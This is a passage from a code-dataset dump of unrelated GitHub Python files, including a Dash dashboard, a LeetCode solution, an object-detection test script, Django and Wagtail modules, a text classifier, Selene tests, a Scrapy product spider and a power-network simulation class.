Output('scatter-chart', 'figure')],\n [Input('korea-map', 'selectedData'),\n Input('pie-labels', 'value')])\ndef draw_all_chart(selectedData, value):\n if value == None:\n value = INITIAL_CHART\n\n if selectedData == None or selectedData['points'] == []:\n selectedData = '전체'\n else:\n selectedData = selectedData['points'][0]['hovertext']\n\n # wordcloud image source, loading time is too long, have to fix it\n img_src = 'https://raw.githubusercontent.com/bin7665/KNU-20201-team2-BizBot/master/file/' + \\\n selectedData + '.png'\n\n return (selectedData + ' 지역', '정부지원사업 ' + pie_charts[value]['name'], get_pie_chart(selectedData, pie_projects[selectedData][value]),\n selectedData + ' 지역', img_src, selectedData + ' 지역', get_scatter_chart(selectedData, scatter_projects[selectedData]))\n\n\n@app.callback(\n # get country data and selected datas in scatter and deliver to selected data box\n Output('selected-data', 'children'),\n [Input('korea-map', 'selectedData'),\n Input('scatter-chart', 'selectedData')])\ndef display_selected_data(mapData, selectedData):\n data_indexs = []\n if mapData == None or mapData['points'] == []:\n mapData = '전체'\n else:\n mapData = mapData['points'][0]['hovertext']\n\n if selectedData != None:\n for sel in selectedData['points']:\n data_indexs.append(sel['customdata'][1])\n\n return selected_data_box(data_indexs)\n\n\n# run dash server\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"bin7665/KNU-20201-team2-BizBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218991121","text":"class Solution:\n def alertNames(self, keyName: 'List[str]', keyTime: 'List[str]') -> 'List[str]':\n hmp = {}\n for i in range(len(keyName)):\n if keyName[i] not in hmp:\n hmp[keyName[i]] = []\n hmp[keyName[i]].append(keyTime[i])\n output = []\n for k, v in hmp.items():\n if len(v) >= 3:\n arr = sorted(v)\n for i in range(2, len(arr)):\n if arr[i][:2] == arr[i - 2][:2]: # same hour\n output.append(k)\n break\n elif int(arr[i][:2]) <= int(arr[i - 2][:2]) + 1 and int(arr[i][-2:]) <= int(arr[i - 2][-2:]):\n output.append(k)\n break\n return sorted(output)\n\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1604.py","file_name":"1604.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"70140014132","text":"\"\"\"Perform inference on one or more datasets.\"\"\"\n\nimport argparse\nimport cv2\nimport os\nimport pprint\nimport sys\nimport time\n\nimport torch\n\n# import tools._init_paths\nimport _init_paths # pylint: disable=unused-import\nfrom core.config import cfg, merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg\nfrom core.test_engine import run_inference\nimport utils.logging\n\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset', default=\"\",\n help='training dataset')\n parser.add_argument(\n '--cfg', dest='cfg_file', required=True,\n help='optional config file')\n parser.add_argument(\n '--load_ckpt', required=True,\n help='path of checkpoint to load')\n parser.add_argument(\n '--load_detectron', help='path to the detectron weight pickle file')\n\n parser.add_argument(\n '--output_dir',\n help='output directory to save the testing results. If not provided, '\n 'defaults to [args.load_ckpt|args.load_detectron]/../test.')\n\n parser.add_argument(\n '--set', dest='set_cfgs',\n help='set config keys, will overwrite config in the cfg_file.'\n ' See lib/core/config.py for all options',\n default=[], nargs='*')\n\n parser.add_argument(\n '--range',\n help='start (inclusive) and end (exclusive) indices',\n type=int, nargs=2)\n parser.add_argument(\n '--multi_gpu_testing', help='using multiple gpus for inference',\n action='store_true')\n parser.add_argument(\n '--vis', dest='vis', help='visualize detections', action='store_true')\n\n return parser.parse_args()\n\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval \nimport numpy as np\nclass BoxEvaluator(object):\n def __init__(self, dataset_json, preds_json):\n self.dataset = COCO(dataset_json)\n self.object_classes = [v['name'] for v in self.dataset.loadCats(self.dataset.getCatIds())]\n self.preds = self.dataset.loadRes(preds_json)\n self.coco_eval = COCOeval(self.dataset, self.preds, 'bbox')\n self.coco_eval.params.iouThrs = np.asarray([0.25, 0.5, 0.75])\n\n def evaluate(self):\n mAP = dict()\n my_cls_ap = dict()\n self.coco_eval.evaluate()\n self.coco_eval.accumulate()\n for thr_ind, thr in enumerate(self.coco_eval.params.iouThrs):\n ap_by_class = []\n for cls_ind, cls_name in enumerate(self.object_classes):\n cls_precision = self.coco_eval.eval['precision'][thr_ind, :, cls_ind, 0, -1]\n cls_ap = np.mean(cls_precision[cls_precision > -1])\n ap_by_class.append(cls_ap)\n mAP['%.2f' % thr] = np.asarray(ap_by_class).mean()\n my_cls_ap['%.2f' % thr] = ap_by_class\n return mAP, my_cls_ap\n\nif __name__ == '__main__':\n\n if not torch.cuda.is_available():\n sys.exit(\"Need a CUDA device to run the code.\")\n\n logger = utils.logging.setup_logging(__name__)\n args = parse_args()\n logger.info('Called with args:')\n logger.info(args)\n\n # assert (torch.cuda.device_count() == 1) ^ bool(args.multi_gpu_testing) # multi-gpu-testing?\n if torch.cuda.device_count() == 1:\n print(\"single GPU\")\n args.multi_gpu_testing = False\n else:\n print(\"multi GPU\")\n args.multi_gpu_testing = True\n\n assert bool(args.load_ckpt) ^ bool(args.load_detectron), \\\n 'Exactly one of --load_ckpt and --load_detectron should be specified.'\n if args.output_dir is None:\n ckpt_path = args.load_ckpt if args.load_ckpt else args.load_detectron\n if 'train' in args.dataset:\n args.output_dir = os.path.join(\n os.path.dirname(os.path.dirname(ckpt_path)), 'trainaug',\n os.path.basename(ckpt_path).split('.')[0])\n else:\n args.output_dir = os.path.join(\n os.path.dirname(os.path.dirname(ckpt_path)), 'test',\n os.path.basename(ckpt_path).split('.')[0])\n logger.info('Automatically set output directory to %s', args.output_dir)\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n cfg.VIS = args.vis\n\n if args.cfg_file is not None:\n merge_cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n merge_cfg_from_list(args.set_cfgs)\n\n if args.dataset == \"coco2017val\":\n cfg.TEST.DATASETS = ('coco_2017_val',)\n cfg.MODEL.NUM_CLASSES = 80\n elif args.dataset == \"coco2017test\":\n cfg.TEST.DATASETS = ('coco_2017_test-dev',)\n cfg.MODEL.NUM_CLASSES = 80\n elif args.dataset == \"coco2017train\":\n cfg.TEST.DATASETS = ('coco_2017_train',)\n cfg.MODEL.NUM_CLASSES = 80\n cfg.TEST.PROPOSAL_FILES = cfg.TRAIN.PROPOSAL_FILES\n elif args.dataset == 'voc2012sbdval':\n cfg.TEST.DATASETS = ('voc_2012_sbdval',)\n cfg.MODEL.NUM_CLASSES = 20\n elif args.dataset == 'voc2012trainaug':\n cfg.TEST.DATASETS = ('voc_2012_trainaug',)\n cfg.MODEL.NUM_CLASSES = 20\n cfg.TEST.PROPOSAL_FILES = cfg.TRAIN.PROPOSAL_FILES\n else: # For subprocess call\n assert cfg.TEST.DATASETS, 'cfg.TEST.DATASETS shouldn\\'t be empty'\n assert_and_infer_cfg()\n\n logger.info('Testing with config:')\n logger.info(pprint.pformat(cfg))\n\n # For test_engine.multi_gpu_test_net_on_dataset\n args.test_net_file, _ = os.path.splitext(__file__)\n # manually set args.cuda\n args.cuda = True\n\n if args.load_ckpt:\n while not os.path.exists(args.load_ckpt):\n logger.info('Waiting for {} to exist...'.format(args.load_ckpt))\n time.sleep(10)\n if args.load_detectron:\n while not os.path.exists(args.load_detectron):\n logger.info('Waiting for {} to exist...'.format(args.load_detectron))\n time.sleep(10)\n\n run_inference(\n args,\n ind_range=args.range,\n multi_gpu_testing=args.multi_gpu_testing,\n check_expected_results=True,flag=cfg.transform_mode)","repo_name":"ZechengLi19/CIM","sub_path":"tools/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"41880123416","text":"from factual.models import Work, Hero, Response\nimport re\n\nWORK_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda work : 'work_' + str(work.id),\n },{\n 'name': 'title',\n 'func': lambda work: work.title,\n },{\n 'name': 'author',\n 'func': lambda work: work.author,\n },{\n 'name': 'medium',\n 'func': lambda work: work.medium,\n },{\n 'name': 'publication year',\n 'func': lambda work: work.pub_year,\n },{\n 'name': 'publication country',\n 'func': lambda work: work.pub_country,\n },{\n 'name': 'source or adaptation',\n 'func': lambda work: 'source' if work.is_source else 'adaptation'\n },{\n 'name': 'adaptation of',\n 'func': lambda work: work.adaptation_of,\n },{\n 'name': 'adaptation of (index)',\n 'func': lambda work: work.adaptation_of.id if work.adaptation_of else ''\n },{\n 'name': 'environment',\n 'func': lambda work: work.environment,\n },{\n 'name': 'number of heroes',\n 'func': lambda work: len(work.heroes.all()),\n },{\n 'name': 'number of responses',\n 'func': lambda work: len(work.responses.all()),\n }]\n\nrelative_format = {\n 'PARENTS_PRESENT': 'parents (present)',\n 'PARENTS_ABSENT': 'parents (absent)',\n 'SIBLINGS_PRESENT': 'siblings (present)',\n 'SIBLINGS_ABSENT': 'siblings (absent)',\n 'UNKNOWN': 'unknown',\n 'NONE': 'none',\n }\n\nHERO_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda hero: 'hero_' + str(hero.id)\n },{\n 'name': 'name',\n 'func': lambda hero: hero.name\n },{\n 'name': 'role',\n 'func': lambda hero: hero.get_role_display(),\n },{\n 'name': 'is narrator',\n 'func': lambda hero: hero.narrator,\n },{\n 'name': 'is focaliser',\n 'func': lambda hero: hero.focaliser,\n },{\n 'name': 'gender',\n 'func': lambda hero: hero.get_gender_display()\n },{\n 'name': 'age',\n 'func': lambda hero: hero.age,\n },{\n 'name': 'country (origin)',\n 'func': lambda hero: hero.country_origin,\n },{\n 'name': 'country (growing up)',\n 'func': lambda hero: hero.country_growup,\n },{\n 'name': 'country (living)',\n 'func': lambda hero: hero.country_live,\n },{\n 'name': 'hobbies',\n 'func': lambda hero: ', '.join(hero.hobbies),\n },{\n 'name': 'pets',\n 'func': lambda hero: ', '.join(hero.pets),\n },{\n 'name': 'education',\n 'func': lambda hero: hero.get_education_display(),\n },{\n 'name': 'profession',\n 'func': lambda hero: hero.get_profession_display(),\n },{\n 'name': 'considered beautiful',\n 'func': lambda hero: hero.appearance,\n },{\n 'name': 'sexual relations described',\n 'func': lambda hero: hero.sex,\n },{\n 'name': 'relatives',\n 'func': lambda hero: ', '.join(relative_format[relative] for relative in hero.relatives)\n },{\n 'name': 'wealth',\n 'func': lambda hero: hero.get_wealth_display(),\n },{\n 'name': 'problems',\n 'func': lambda hero: ', '.join(hero.problems),\n },{\n 'name': 'solutions',\n 'func': lambda hero: ', '.join(hero.solutions),\n },{\n 'name': 'number of responses',\n 'func': lambda hero: len(hero.responses.all()),\n }]\n\n\nRESPONSE_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda response: 'response_' + str(response.id)\n },{\n 'name': 'gender',\n 'func': lambda response: response.responses.get('participant_gender', None),\n },{\n 'name': 'age',\n 'func': lambda response: response.responses.get('participant_age', None),\n },{\n 'name': 'nationality',\n 'func': lambda response: response.responses.get('participant_nationality', None),\n },{\n 'name': 'identification: personality',\n 'func': lambda response: response.responses['identification_personality'],\n },{\n 'name': 'identification: intruiging',\n 'func': lambda response: response.responses['identification_intruiging'],\n },{\n 'name': 'identification: wish to be like',\n 'func': lambda response: response.responses['identification_wishbelike'],\n },{\n 'name': 'appearance: beautiful',\n 'func': lambda response: response.responses['appearance_beautiful'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: wish to look like',\n 'func': lambda response: response.responses['appearance_wishlookedlike'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: influence feelings',\n 'func': lambda response: response.responses['appearance_influencefeelings'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: impact',\n 'func': lambda response: response.responses['appearance_impact'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: aware',\n 'func': lambda response: response.responses['appearance_aware'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'gender: defines personality',\n 'func': lambda response: response.responses['gender_definespersonality'],\n },{\n 'name': 'gender: embraces',\n 'func': lambda response: response.responses['gender_embraces'],\n },{\n 'name': 'gender: attempts expectations',\n 'func': lambda response: response.responses['gender_attempts_expectations'],\n },{\n 'name': 'gender: struggles expectations',\n 'func': lambda response: response.responses['gender_struggles_expectations'],\n },{\n 'name': 'agency: responsible',\n 'func': lambda response: response.responses['agency_responsible'],\n },{\n 'name': 'agency: independent',\n 'func': lambda response: response.responses['agency_independent'],\n },{\n 'name': 'agency: hindered',\n 'func': lambda response: response.responses['agency_hindered'],\n },{\n 'name': 'agency: environment',\n 'func': lambda response: response.responses['agency_environment'],\n },{\n 'name': 'agency: development',\n 'func': lambda response: response.responses['agency_development'],\n },{\n 'name': 'profession: relevant to personality',\n 'func': lambda response: response.responses['profession_relevant_to_personality'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: social status',\n 'func': lambda response: response.responses['profession_social_status'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: growth',\n 'func': lambda response: response.responses['profession_growth'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: defines life',\n 'func': lambda response: response.responses['profession_defines_life'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'personality: assertive',\n 'func': lambda response: response.responses['personality_assertive'],\n },{\n 'name': 'personality: independent',\n 'func': lambda response: response.responses['personality_independent'],\n },{\n 'name': 'personality: vain',\n 'func': lambda response: response.responses['personality_vain'],\n },{\n 'name': 'personality: confident',\n 'func': lambda response: response.responses['personality_confident'],\n },{\n 'name': 'personality: well-rounded',\n 'func': lambda response: response.responses['personality_wellrounded'],\n },{\n 'name': 'personality: honest',\n 'func': lambda response: response.responses['personality_honest'],\n },{\n 'name': 'personality: loyal',\n 'func': lambda response: response.responses['personality_loyal'],\n },{\n 'name': 'personality: cooperative',\n 'func': lambda response: response.responses['personality_cooperative'],\n },\n ]\n\ndef format_tsv(lines):\n format = lambda item: re.sub(r'\\s+', ' ', str(item))\n formatted = '\\n'.join(\n ['\\t'.join(format(item) for item in line) for line in lines]\n )\n return formatted\n\ndef download_works():\n header = [field['name'] for field in WORK_FIELDS]\n lines = [header]\n\n works = Work.objects.all()\n for work in works:\n items = [field['func'](work) for field in WORK_FIELDS]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n\ndef download_heroes():\n work_fields = ['work: ' + field['name'] for field in WORK_FIELDS]\n hero_fields = [field['name'] for field in HERO_FIELDS]\n header = hero_fields[:2] + work_fields + hero_fields[2:]\n lines = [header]\n\n heroes = Hero.objects.all()\n for hero in heroes:\n work_items = [field['func'](hero.work) for field in WORK_FIELDS]\n items = [field['func'](hero) for field in HERO_FIELDS]\n items = items[:2] + work_items + items[2:]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n\ndef download_responses():\n work_fields = ['work: ' + field['name'] for field in WORK_FIELDS]\n hero_fields = [field['name'] for field in HERO_FIELDS]\n response_fields = [field['name'] for field in RESPONSE_FIELDS]\n header = response_fields[:1] + work_fields + hero_fields + response_fields[1:]\n lines = [header]\n\n responses = Response.objects.all()\n for response in responses:\n work_items = [field['func'](response.work) for field in WORK_FIELDS]\n hero_items = [field['func'](response.hero) for field in HERO_FIELDS]\n items = [field['func'](response) for field in RESPONSE_FIELDS]\n items = items[:1] + work_items + hero_items + items[1:]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n","repo_name":"UUDigitalHumanitieslab/Map-your-Heroine","sub_path":"backend/factual/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28536816977","text":"from wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\n\nclass BannerImageAndTextBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True, help_text='Add your title')\n image = ImageChooserBlock(required=True)\n\n\n class Meta:\n template = \"blocks/AboutUsBanner.html\"\n icon = \"edit\"\n label = \"Title & Image Banner\"\n\nclass SimpleRichtextBlock(blocks.RichTextBlock):\n\n def __init__(self, required=True, help_text=None, editor='default', features=None, validators=(), **kwargs):\n super().__init__(**kwargs)\n self.features = [\n \"bold\",\n \"italic\",\n \"link\",\n ]\n\n class Meta:\n template = \"blocks/richtext_block.html\"\n icon = \"edit\"\n label = \"Simple Richtext\"\n\nclass CardsBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True , help_text=\"Add your title\")\n cards = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"image\",ImageChooserBlock(required=True)),\n (\"title\",blocks.CharBlock(required=True,max_length=40)),\n (\"text\",blocks.TextBlock(required=True)),\n (\"url_button\",blocks.URLBlock(required=False))\n ]\n )\n )\n\n class Meta:\n template = \"blocks/card_block.html\"\n icon=\"placeholder\"\n label=\"Cards\"\n\nclass DropDownBlock(blocks.StructBlock):\n # link_title = blocks.CharBlock(blank=True,null=True,max_length=50)\n drop_down = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"link_title\",blocks.CharBlock(required=True,max_length=40)),\n (\"link_page\",blocks.PageChooserBlock(required=False)),\n ]\n )\n )\n # open_in_new_tab = models.BooleanField(default=False,blank=True,)\n\n class Meta:\n template = \"blocks/drop_down_block.html\"\n icon=\"placeholder\"\n label=\"Drop Down\"","repo_name":"Mohammad-Abdul-Ghafour/wagtail_template","sub_path":"blocks/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16232348093","text":"# -*- coding: UTF-8 -*-\nimport argparse\nimport pandas as pd\nimport string\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset',\n default='output.csv',\n help='XXXX.json, XXXX is the file')\n args = parser.parse_args()\n\n print('start processing data')\n # Data Processing\n input_data = pd.read_csv(args.dataset)\n input_data['overall'] = input_data['overall'].astype(object) # fix datatype error\n input_data['reviewText'] = input_data['reviewText'].astype(object) # fix datatype error\n \n dataset = {'reviewText': input_data['reviewText'], 'overall': input_data['overall']}\n dataset = pd.DataFrame(data = dataset)\n dataset = dataset.dropna() # ignore if any row contained NaN\n dataset = dataset[dataset['overall'] != '3']\n dataset['label'] = dataset['overall'].apply(lambda rating : +1 if str(rating) > '3' else -1)\n\n # Splitting data into training set and testing set\n X = pd.DataFrame(dataset, columns = ['reviewText'])\n y = pd.DataFrame(dataset, columns = ['label'])\n train_X, test_X, trian_y, test_y = train_test_split(X, y, random_state=50)\n\n # Bag of Words model\n vectorizer = CountVectorizer(token_pattern=r'\\b\\w+\\b')\n train_vector = vectorizer.fit_transform(train_X['reviewText'])\n test_vector = vectorizer.transform(test_X['reviewText'])\n print('processing ... ok')\n print('start training model')\n # LogisticRegression model for classification problems\n clr = LogisticRegression()\n clr.fit(train_vector, trian_y.values.ravel())\n scores = clr.score(test_vector, test_y) # accracy\n print('training ...ok')\n print('accuracy: {}%'.format(scores*100))\n","repo_name":"Amber0914/NLP-Text_Classification","sub_path":"text_classification.py","file_name":"text_classification.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43057149147","text":"from selenium import webdriver\n\nfrom selene import config\nfrom selene.common.none_object import NoneObject\nfrom selene.driver import SeleneDriver\nfrom tests.acceptance.helpers.helper import get_test_driver\nfrom tests.integration.helpers.givenpage import GivenPage\n\n__author__ = 'yashaka'\n\ndriver = NoneObject('driver') # type: SeleneDriver\nGIVEN_PAGE = NoneObject('GivenPage') # type: GivenPage\nWHEN = GIVEN_PAGE # type: GivenPage\noriginal_timeout = config.timeout\n\n\ndef setup_module(m):\n global driver\n driver = SeleneDriver.wrap(get_test_driver())\n global GIVEN_PAGE\n GIVEN_PAGE = GivenPage(driver)\n global WHEN\n WHEN = GIVEN_PAGE\n\n\ndef teardown_module(m):\n driver.quit()\n\n\ndef setup_function(fn):\n global original_timeout\n config.timeout = original_timeout\n\n\ndef test_search_is_lazy_and_does_not_start_on_creation_for_both_parent_and_inner():\n GIVEN_PAGE.opened_empty()\n non_existent_element = driver.element('#not-existing-element').element('.not-existing-inner')\n assert str(non_existent_element)\n\n\ndef test_search_is_postponed_until_actual_action_like_questioning_displayed():\n GIVEN_PAGE.opened_empty()\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n

\n Hello kitty:*\n

''')\n assert element.is_displayed() is True\n\n\ndef test_search_is_updated_on_next_actual_action_like_questioning_displayed():\n GIVEN_PAGE.opened_empty()\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n

\n Hello kitty:*\n

''')\n assert element.is_displayed() is True\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n

\n Hello kitty:*\n

''')\n assert element.is_displayed() is False\n\n\ndef test_search_finds_exactly_inside_parent():\n GIVEN_PAGE.opened_with_body('''\n go to Heading 2\n

\n go to Heading 2\n

Heading 1

\n

Heading 2

\n /p>''')\n\n driver.element('p').element('a').click()\n assert (\"second\" in driver.current_url) is True\n","repo_name":"vkpro-forks/selene","sub_path":"tests/integration/inner_selement_lazy_search_test.py","file_name":"inner_selement_lazy_search_test.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6768451968","text":"import scrapy\n\nclass EcommerceSpider(scrapy.Spider):\n name = 'ecommerce_spider'\n start_urls = ['https://www.spinneyslebanon.com/default/alcohol.html',\n 'https://www.spinneyslebanon.com/default/beverages.html',\n 'https://www.spinneyslebanon.com/default/bakery.html',\n 'https://www.spinneyslebanon.com/default/deli-dairy-eggs.html',\n 'https://www.spinneyslebanon.com/default/fruits-vegetables.html',\n 'https://www.spinneyslebanon.com/default/meat-seafood.html',\n 'https://www.spinneyslebanon.com/default/frozen.html',\n 'https://www.spinneyslebanon.com/default/food-cupboard.html'] # Replace with the actual URL of the product listing page\n\n def parse(self, response):\n # Extract the product URLs from the listing page\n product_urls = response.css(\".product-item-info\").css(\"::attr(href)\").re(\".*.html\")\n\n # Follow each product URL and extract fields\n for url in product_urls:\n yield scrapy.Request(url, callback=self.parse_product)\n\n # Follow pagination links if available\n next_page_url = response.css('.next::attr(href)').get()\n if next_page_url:\n yield scrapy.Request(next_page_url, callback=self.parse)\n\n def parse_product(self, response):\n # Extract fields from the product page\n title = response.css('.base::text').get()\n price = response.css('.price::text').get()\n description = response.css('div.value::text').get()\n image_url = response.css(\".imgzoom::attr(data-zoom)\").get()\n brand = response.css(\"span.prod_brand a ::text\").get()\n quantity = response.css(\"span.prod_brand ::text\").get() + \" \" + response.css(\"span.prod_weight::text\").get()\n about_the_brand = response.css(\"span.brand_base_text ::text\").get()\n # nutritional_facts = response.css('div.nutritionalFacts#nutritionalFacts::text').get()\n\n # Process or store the extracted data as needed\n yield {\n 'title': title,\n 'price': price,\n 'description': description,\n 'image_url' : image_url,\n 'quantity':quantity,\n 'brand':brand,\n 'about_the_brand':about_the_brand\n }\n","repo_name":"omtarful/spinneys-chatbot","sub_path":"spinneys-alcohol-spider/spinneys-spider.py","file_name":"spinneys-spider.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121419107","text":"from relsad.network.components import Bus, Line\nfrom relsad.Time import Time, TimeStamp, TimeUnit\nfrom relsad.utils import INF, eq, unique\n\nfrom .Transmission import Transmission\n\n\nclass SubSystem:\n \"\"\"Class defining a sub system network type\n ...\n\n Attributes\n ----------\n name : str\n Name of the sub system\n slack : Bus\n The system slack bus, used for power flow calculations\n buses : list\n List of all buses in the sub system\n ev_parks : list\n List of all EV parks in the sub system\n batteries : list\n List of all batteries in the sub system\n production : list\n List of all generation units in the sub system\n lines : list\n List of all lines in the sub system\n sensors : list\n List of all sensors in the sub system\n circuitbreaker : list\n List of all circuit breakers in the sub system\n disconnectors : list\n List of all disconnectors in the sub system\n intelligent_switch : list\n List of all intelligent switches in the sub system\n comp_list : list\n List containing the components in the sub system\n comp_dict : dict\n Dictionary containing the components in the sub system\n child_network_list : list\n List containing the child networks to the sub system\n\n\n Methods\n ----------\n add_bus(bus)\n Adding a bus including elements on the bus (battery, generation unit, EV park) to the sub system\n add_buses(buses)\n Adding buses to the sub system\n add_line(Line)\n Adding a line including elements on the line (sensor, circuit breaker, disconnector) to the sub system\n add_lines(lines)\n Adding lines to the sub system\n add_cild_network(network)\n Adding child network to the sub system\n get_system_load_balance()\n Returns the load balance of the system\n update_batteries(fail_duration, dt)\n Updates the batteries in the sub system\n update_ev_parks(fail_duration, dt, start_time, curr_time)\n Updates the EV parks in the sub system\n reset_load_flow_data()\n Reset the variables used in the load flow analysis\n\n \"\"\"\n\n ## Visual attributes\n color = \"black\"\n\n ## Counter\n counter = 0\n\n def __init__(self):\n # Info\n SubSystem.counter += 1\n self.name = \"ps{:d}\".format(SubSystem.counter)\n # Load flow\n self.slack = None\n # Components\n self.buses = list()\n self.ev_parks = list()\n self.batteries = list()\n self.productions = list()\n self.lines = list()\n self.sensors = list()\n self.intelligent_switch = list()\n self.circuitbreakers = list()\n self.disconnectors = list()\n self.comp_list = list()\n self.comp_dict = dict()\n ## Child networks\n self.child_network_list: list = list()\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return f\"SubSystem(name={self.name})\"\n\n def __eq__(self, other):\n if hasattr(other, \"buses\") and hasattr(other, \"lines\"):\n return set(unique(self.buses + self.lines)) == set(\n unique(other.buses + other.lines)\n )\n else:\n return False\n\n def __hash__(self):\n return hash(self.name)\n\n def add_bus(self, bus: Bus):\n \"\"\"\n Adding a bus including elements on the bus (battery, generation unit, EV park) to the sub system\n\n Parameters\n ----------\n bus : Bus\n A bus element\n\n Returns\n ----------\n None\n\n \"\"\"\n self.comp_dict[bus.name] = bus\n self.comp_list.append(bus)\n self.buses.append(bus)\n self.buses = unique(self.buses)\n if bus.ev_park is not None:\n self.comp_dict[bus.ev_park.name] = bus.ev_park\n self.comp_list.append(bus.ev_park)\n self.ev_parks.append(bus.ev_park)\n self.ev_parks = unique(self.ev_parks)\n if bus.battery is not None:\n self.comp_dict[bus.battery.name] = bus.battery\n self.comp_list.append(bus.battery)\n self.batteries.append(bus.battery)\n self.batteries = unique(self.batteries)\n if bus.prod is not None:\n self.comp_dict[bus.prod.name] = bus.prod\n self.comp_list.append(bus.prod)\n self.productions.append(bus.prod)\n self.productions = unique(self.productions)\n self.comp_list = unique(self.comp_list)\n\n def add_buses(self, buses: list):\n \"\"\"Adding buses to the sub system\n\n Parameters\n ----------\n buses : list\n A list of Bus elements in the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n for bus in buses:\n self.add_bus(bus)\n\n def add_line(self, line: Line):\n \"\"\"\n Adding a line including elements on the line (sensor, circuit breaker, disconnector) to the sub system\n\n Parameters\n ----------\n line : Line\n A line element\n\n Returns\n ----------\n None\n\n \"\"\"\n self.comp_dict[line.name] = line\n self.comp_list.append(line)\n self.lines.append(line)\n self.lines = unique(self.lines)\n for discon in line.disconnectors:\n self.comp_dict[discon.name] = discon\n self.comp_list.append(discon)\n self.disconnectors.append(discon)\n self.disconnectors = unique(self.disconnectors)\n if line.circuitbreaker is not None:\n c_b = line.circuitbreaker\n self.comp_dict[c_b.name] = c_b\n self.comp_list.append(c_b)\n self.circuitbreakers.append(c_b)\n self.circuitbreakers = unique(self.circuitbreakers)\n self.comp_list = unique(self.comp_list)\n\n def add_lines(self, lines: list):\n \"\"\"\n Adding lines to the sub system\n\n Parameters\n ----------\n lines : list\n A list of Line elements in the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n for line in lines:\n self.add_line(line)\n\n def add_child_network(self, network):\n \"\"\"\n Adding child network to the sub system\n\n Parameters\n ----------\n network : PowerNetwork\n The child network of the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n self.child_network_list.append(network)\n\n def get_system_load_balance(self):\n \"\"\"\n Returns the load balance of the system\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n system_load_balance_p : flaot\n The active power load balance in the sub system (load - generation)\n system_load_balance_q : float\n The reactive power load balance in the sub system (load - generation)\n\n \"\"\"\n system_load_balance_p, system_load_balance_q = 0, 0\n for bus in self.buses:\n for child_network in self.child_network_list:\n if isinstance(child_network, Transmission):\n if bus == child_network.get_trafo_bus():\n system_load_balance_p = -INF\n system_load_balance_q = 0\n return system_load_balance_p, system_load_balance_q\n system_load_balance_p += bus.pload - bus.pprod\n system_load_balance_q += bus.qload - bus.qprod\n return system_load_balance_p, system_load_balance_q\n\n def update_batteries(self, fail_duration: Time, dt: Time):\n \"\"\"\n Updates the batteries in the sub system\n\n Parameters\n ----------\n fail_duration : Time\n The failure duration\n dt : Time\n The current time step\n\n Returns\n ----------\n None\n\n \"\"\"\n p, q = self.get_system_load_balance()\n for battery in self.batteries:\n p, q = battery.update(p, q, fail_duration, dt)\n\n def update_ev_parks(\n self,\n fail_duration: Time,\n dt: Time,\n start_time: TimeStamp,\n curr_time: Time,\n ):\n \"\"\"\n Updates the EV parks in the sub system\n\n Parameters\n ----------\n fail_duration : Time\n The failure duration\n dt : Time\n The current time step\n start_time : 